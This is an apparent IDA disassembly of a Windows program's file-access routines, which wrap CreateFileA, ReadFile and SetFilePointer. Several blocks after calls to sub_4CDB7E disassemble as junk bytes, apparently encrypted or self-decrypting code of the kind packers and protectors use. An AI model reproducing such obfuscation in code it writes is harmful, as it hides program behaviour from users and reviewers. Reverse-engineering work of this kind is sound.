mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D153F
test eax, eax
jz loc_4D041B
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_4D041B
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_8], eax
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_4E16A8 ; CreateFileA
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4D0416
push 0
push 0
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call ds:dword_4E1788 ; SetFilePointer
push 10h
call sub_4D835A
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+8], ecx
mov eax, [ebp+var_10]
and dword ptr [eax+4], 0
movzx eax, [ebp+arg_10]
neg eax
sbb eax, eax
and eax, 0C0000000h
add eax, 40000000h
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
push [ebp+var_10]
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov ecx, ds:dword_4E18E4
call sub_4CC000
loc_4D0416: ; CODE XREF: sub_4D0346+63�j
push 1
pop eax
jmp short locret_4D041D
; ---------------------------------------------------------------------------
loc_4D041B: ; CODE XREF: sub_4D0346+20�j
; sub_4D0346+2C�j
xor eax, eax
locret_4D041D: ; CODE XREF: sub_4D0346+D3�j
leave
retn 14h
sub_4D0346 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0421 proc near ; CODE XREF: sub_4CFFBF+164�p
; sub_4D5BD7+11D�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 004D065F SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE368
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
cmp [ebp+arg_C], 0
jnz short loc_4D0452
lea eax, [ebp+var_1C]
mov [ebp+arg_C], eax
loc_4D0452: ; CODE XREF: sub_4D0421+29�j
mov eax, ds:dword_4E18E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D0473
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4D0477
; ---------------------------------------------------------------------------
loc_4D0473: ; CODE XREF: sub_4D0421+3D�j
and [ebp+var_30], 0
loc_4D0477: ; CODE XREF: sub_4D0421+50�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_4D065F
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_4D0638
mov eax, [ebp+var_24]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4D04EB
push [ebp+arg_8]
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1788 ; SetFilePointer
mov ecx, [ebp+arg_C]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_4D0661
; ---------------------------------------------------------------------------
loc_4D04EB: ; CODE XREF: sub_4D0421+96�j
mov eax, [ebp+var_24]
mov eax, [eax+4]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jnz short loc_4D054D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
cmp ecx, [eax+8]
jle short loc_4D051E
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D0548
; ---------------------------------------------------------------------------
loc_4D051E: ; CODE XREF: sub_4D0421+E2�j
cmp [ebp+arg_4], 0
jge short loc_4D0537
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
jmp short loc_4D0548
; ---------------------------------------------------------------------------
loc_4D0537: ; CODE XREF: sub_4D0421+101�j
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
loc_4D0548: ; CODE XREF: sub_4D0421+FB�j
; sub_4D0421+114�j
jmp loc_4D061F
; ---------------------------------------------------------------------------
loc_4D054D: ; CODE XREF: sub_4D0421+D7�j
cmp [ebp+arg_8], 2
jnz short loc_4D05AE
cmp [ebp+arg_4], 0
jle short loc_4D0572
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D05AC
; ---------------------------------------------------------------------------
loc_4D0572: ; CODE XREF: sub_4D0421+136�j
mov eax, [ebp+var_20]
mov eax, [eax+8]
neg eax
cmp [ebp+arg_4], eax
jge short loc_4D0592
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
jmp short loc_4D05AC
; ---------------------------------------------------------------------------
loc_4D0592: ; CODE XREF: sub_4D0421+15C�j
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
add ecx, [eax+8]
mov eax, [ebp+var_24]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4D05AC: ; CODE XREF: sub_4D0421+14F�j
; sub_4D0421+16F�j
jmp short loc_4D061F
; ---------------------------------------------------------------------------
loc_4D05AE: ; CODE XREF: sub_4D0421+130�j
cmp [ebp+arg_8], 1
jnz short loc_4D0611
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_20]
cmp eax, [ecx+8]
jle short loc_4D05DB
mov eax, [ebp+var_24]
mov ecx, [ebp+var_20]
mov ecx, [ecx+8]
mov [eax+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
jmp short loc_4D060F
; ---------------------------------------------------------------------------
loc_4D05DB: ; CODE XREF: sub_4D0421+19F�j
mov eax, [ebp+var_28]
add eax, [ebp+arg_4]
test eax, eax
jge short loc_4D05F8
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 83h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
jmp short loc_4D060F
; ---------------------------------------------------------------------------
loc_4D05F8: ; CODE XREF: sub_4D0421+1C2�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_24]
mov ecx, [ecx+4]
mov [eax], ecx
loc_4D060F: ; CODE XREF: sub_4D0421+1B8�j
; sub_4D0421+1D5�j
jmp short loc_4D061F
; ---------------------------------------------------------------------------
loc_4D0611: ; CODE XREF: sub_4D0421+191�j
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 57h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
loc_4D061F: ; CODE XREF: sub_4D0421:loc_4D0548�j
; sub_4D0421:loc_4D05AC�j ...
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4D0661
; ---------------------------------------------------------------------------
loc_4D0638: ; CODE XREF: sub_4D0421+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D0643
jmp short loc_4D065F
sub_4D0421 endp
; =============== S U B R O U T I N E =======================================
sub_4D0643 proc near ; CODE XREF: sub_4D0421+21B�p
; DATA XREF: _5:004DE370�o
mov eax, ds:dword_4E18E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_4D065E
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D065E: ; CODE XREF: sub_4D0643+C�j
retn
sub_4D0643 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0421
loc_4D065F: ; CODE XREF: sub_4D0421+5C�j
; sub_4D0421+220�j
xor eax, eax
loc_4D0661: ; CODE XREF: sub_4D0421+C5�j
; sub_4D0421+215�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_4D0421
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0672 proc near ; CODE XREF: sub_4D1CC4+80�p
; sub_4D5456+58�p ...
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D072E SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE378
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E18E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D06B8
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D06BC
; ---------------------------------------------------------------------------
loc_4D06B8: ; CODE XREF: sub_4D0672+31�j
and [ebp+var_24], 0
loc_4D06BC: ; CODE XREF: sub_4D0672+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4D072E
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D0707
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D0730
; ---------------------------------------------------------------------------
loc_4D0707: ; CODE XREF: sub_4D0672+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D0712
jmp short loc_4D072E
sub_4D0672 endp
; =============== S U B R O U T I N E =======================================
sub_4D0712 proc near ; CODE XREF: sub_4D0672+99�p
; DATA XREF: _5:004DE380�o
mov eax, ds:dword_4E18E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4D072D
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D072D: ; CODE XREF: sub_4D0712+C�j
retn
sub_4D0712 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0672
loc_4D072E: ; CODE XREF: sub_4D0672+50�j
; sub_4D0672+9E�j
xor eax, eax
loc_4D0730: ; CODE XREF: sub_4D0672+93�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D0672
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0741 proc near ; CODE XREF: sub_4CC3F3+58�p
; sub_4CF12B+22�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE388
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jnz short loc_4D0772
lea eax, [ebp+var_1C]
mov [ebp+arg_4], eax
loc_4D0772: ; CODE XREF: sub_4D0741+29�j
mov eax, ds:dword_4E18E4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4D0793
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4D0797
; ---------------------------------------------------------------------------
loc_4D0793: ; CODE XREF: sub_4D0741+3D�j
and [ebp+var_2C], 0
loc_4D0797: ; CODE XREF: sub_4D0741+50�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4D0845
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D0809
mov eax, [ebp+var_20]
push dword ptr [eax+8]
call ds:dword_4E16A4 ; CloseHandle
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB8E0
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4D83DD
pop ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_4D0847
; ---------------------------------------------------------------------------
loc_4D0809: ; CODE XREF: sub_4D0741+7B�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4CF818
push 0FFFFFFFFh
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_4D0847
; ---------------------------------------------------------------------------
loc_4D0829: ; DATA XREF: _5:004DE390�o
mov eax, ds:dword_4E18E4
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short locret_4D0844
mov eax, [ebp+var_30]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D0844: ; CODE XREF: sub_4D0741+F4�j
retn
; ---------------------------------------------------------------------------
loc_4D0845: ; CODE XREF: sub_4D0741+5C�j
xor eax, eax
loc_4D0847: ; CODE XREF: sub_4D0741+C6�j
; sub_4D0741+E6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4D0741 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0858 proc near ; CODE XREF: sub_4DA710+12�p
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004D093D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE398
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
cmp [ebp+arg_8], 0
jnz short loc_4D0889
lea eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_4D0889: ; CODE XREF: sub_4D0858+29�j
mov eax, ds:dword_4E18E4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D08AA
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_4D08AE
; ---------------------------------------------------------------------------
loc_4D08AA: ; CODE XREF: sub_4D0858+3D�j
and [ebp+var_28], 0
loc_4D08AE: ; CODE XREF: sub_4D0858+50�j
movzx eax, [ebp+var_28]
test eax, eax
jz loc_4D093D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D0916
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16FC ; GetFileInformationByHandle
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_4]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov ecx, [ebp+arg_4]
mov eax, [eax+8]
mov [ecx+24h], eax
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_4D093F
; ---------------------------------------------------------------------------
loc_4D0916: ; CODE XREF: sub_4D0858+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D0921
jmp short loc_4D093D
sub_4D0858 endp
; =============== S U B R O U T I N E =======================================
sub_4D0921 proc near ; CODE XREF: sub_4D0858+C2�p
; DATA XREF: _5:004DE3A0�o
mov eax, ds:dword_4E18E4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_4D093C
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D093C: ; CODE XREF: sub_4D0921+C�j
retn
sub_4D0921 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0858
loc_4D093D: ; CODE XREF: sub_4D0858+5C�j
; sub_4D0858+C7�j
xor eax, eax
loc_4D093F: ; CODE XREF: sub_4D0858+BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4D0858
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0950 proc near ; CODE XREF: sub_4DA741+B�p
; sub_4DA77D+B�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004D09FD SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3A8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E18E4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D0996
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D099A
; ---------------------------------------------------------------------------
loc_4D0996: ; CODE XREF: sub_4D0950+31�j
and [ebp+var_24], 0
loc_4D099A: ; CODE XREF: sub_4D0950+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz short loc_4D09FD
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4D09D6
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D09FF
; ---------------------------------------------------------------------------
loc_4D09D6: ; CODE XREF: sub_4D0950+6B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D09E1
jmp short loc_4D09FD
sub_4D0950 endp
; =============== S U B R O U T I N E =======================================
sub_4D09E1 proc near ; CODE XREF: sub_4D0950+8A�p
; DATA XREF: _5:004DE3B0�o
mov eax, ds:dword_4E18E4
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4D09FC
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4D09FC: ; CODE XREF: sub_4D09E1+C�j
retn
sub_4D09E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D0950
loc_4D09FD: ; CODE XREF: sub_4D0950+50�j
; sub_4D0950+8F�j
xor eax, eax
loc_4D09FF: ; CODE XREF: sub_4D0950+84�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4D0950
; ---------------------------------------------------------------------------
loc_4D0A10: ; CODE XREF: sub_4D0C5C+2F1�p
; sub_4D1177+1CF�p
push ebp
mov ebp, esp
sub esp, 0ECh
push ebx
push esi
push edi
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-10h], eax
mov eax, ds:dword_4E18F8
mov [ebp-4], eax
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-8], eax
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz loc_4D0AD8
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jnz short loc_4D0AD8
mov eax, [ebp-8]
mov ecx, [ebp+0Ch]
sub ecx, [eax+4]
mov [ebp-14h], ecx
mov eax, [ebp-14h]
xor edx, edx
push 8
pop ecx
div ecx
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0
jz short loc_4D0A93
mov eax, [ebp+0Ch]
sub eax, [ebp-18h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
add eax, [ebp-18h]
mov [ebp-10h], eax
mov eax, [ebp-4]
add eax, [ebp-18h]
mov [ebp-4], eax
loc_4D0A93: ; CODE XREF: _4:004D0A76�j
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
test edx, edx
jz short loc_4D0AB8
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
push 8
pop eax
sub eax, edx
mov ecx, [ebp-10h]
add ecx, eax
mov [ebp-10h], ecx
loc_4D0AB8: ; CODE XREF: _4:004D0A9F�j
mov eax, [ebp+8]
mov ecx, [ebp-10h]
add ecx, [eax+4]
mov eax, [ebp-8]
cmp ecx, [eax+8]
jbe short loc_4D0AD8
mov eax, [ebp-8]
mov ecx, [ebp+8]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp-10h], eax
loc_4D0AD8: ; CODE XREF: _4:004D0A46�j _4:004D0A57�j ...
push 0
push 0
push dword ptr [ebp-0Ch]
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4E1788 ; SetFilePointer
cmp eax, [ebp-0Ch]
jz short loc_4D0AF7
xor eax, eax
jmp loc_4D0C55
; ---------------------------------------------------------------------------
loc_4D0AF7: ; CODE XREF: _4:004D0AEE�j
push 0
push dword ptr [ebp+14h]
push dword ptr [ebp-10h]
push ds:dword_4E18F8
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4E177C ; ReadFile
test eax, eax
jnz short loc_4D0B1C
xor eax, eax
jmp loc_4D0C55
; ---------------------------------------------------------------------------
loc_4D0B1C: ; CODE XREF: _4:004D0B13�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp-10h]
jz short loc_4D0B2D
xor eax, eax
jmp loc_4D0C55
; ---------------------------------------------------------------------------
loc_4D0B2D: ; CODE XREF: _4:004D0B24�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz loc_4D0C3C
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 10h
jnz short loc_4D0BA9
push offset dword_460000
call sub_4CDB7E ; CODE XREF: _4:004D0B5B�j
sub eax, 7424E45Ah
db 3Eh
jle short near ptr loc_4D0B51+3
cmpsb
push edi
fisttp dword ptr [edx+esi*4+61h]
clc
lds ebp, [ecx-26h]
db 2Eh ; CODE XREF: _4:loc_4D0B99�j
icebp
and eax, 7EFC9E45h
dec edi
jmp short loc_4D0B99
; ---------------------------------------------------------------------------
dw 4521h
dd 72A5F15Eh, 0DB928439h, 0E0C5324Fh, 48F284DAh, 0C220AB13h
dd 6D611A5Fh, 0A31D6C36h, 90A16E44h, 0E2FDF0E3h
; ---------------------------------------------------------------------------
cmc
loc_4D0B99: ; CODE XREF: _4:004D0B70�j
jmp short near ptr loc_4D0B68+1
; ---------------------------------------------------------------------------
db 0C1h
db 2 dup(90h)
dw 0C033h
dd 0EE75C085h, 93E9h
db 0
; ---------------------------------------------------------------------------
loc_4D0BA9: ; CODE XREF: _4:004D0B4A�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz short loc_4D0C32
push 120000h
call sub_4CDB7E
mov esp, 0E59375A9h
lodsd
punpckhwd mm7, mm4
mov bl, 0AEh
xchg eax, edx
enter 493Dh, 20h
add esi, esi
xchg dh, [ebx-683002FDh]
adc [edi-1471F021h], ebx
mov dl, 34h
; ---------------------------------------------------------------------------
db 8Ch, 0F5h, 65h
dd 975D2033h, 0B1BE20AAh, 97A380A4h, 9FC19C8Fh, 2DDFCC3h
dd 0E1EECB75h, 9276A8BBh, 680CACDAh, 31B9E518h, 0ED0915C7h
dd 0DA20F7ABh, 0DB497237h, 758264EEh, 9E554C68h, 0DE8DD8CBh
dd 0CE190CFFh, 0A5B28F65h, 0C0339090h, 0EE75C085h
; ---------------------------------------------------------------------------
jmp short loc_4D0C3C
; ---------------------------------------------------------------------------
loc_4D0C32: ; CODE XREF: _4:004D0BB5�j
mov ecx, 0EF000014h
call sub_4D8342
loc_4D0C3C: ; CODE XREF: _4:004D0B38�j _4:004D0C30�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp+10h]
jnb short loc_4D0C4A
xor eax, eax
jmp short loc_4D0C55
; ---------------------------------------------------------------------------
loc_4D0C4A: ; CODE XREF: _4:004D0C44�j
mov eax, [ebp+14h]
mov ecx, [ebp+10h]
mov [eax], ecx
mov eax, [ebp-4]
loc_4D0C55: ; CODE XREF: _4:004D0AF2�j _4:004D0B17�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D0C5C proc near ; CODE XREF: sub_4D100B+30�p
; sub_4D100B+EB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D0EAD SIZE 0000015E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3B8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4E1908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
mov [ebp+var_24], eax
and [ebp+var_28], 0
and [ebp+var_40], 0
jmp short loc_4D0CB0
; ---------------------------------------------------------------------------
loc_4D0CA9: ; CODE XREF: sub_4D0C5C:loc_4D0CED�j
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_40], eax
loc_4D0CB0: ; CODE XREF: sub_4D0C5C+4B�j
cmp [ebp+var_40], 3
jnb short loc_4D0CEF
mov eax, [ebp+var_40]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_4E0B7C[eax]
cmp eax, [ecx]
jnz short loc_4D0CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:dword_4E0B78[eax]
cmp eax, [ebp+arg_4]
jnz short loc_4D0CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:off_4E0B80[eax]
mov eax, [eax]
jmp loc_4D0FFA
; ---------------------------------------------------------------------------
loc_4D0CED: ; CODE XREF: sub_4D0C5C+6B�j
; sub_4D0C5C+7C�j
jmp short loc_4D0CA9
; ---------------------------------------------------------------------------
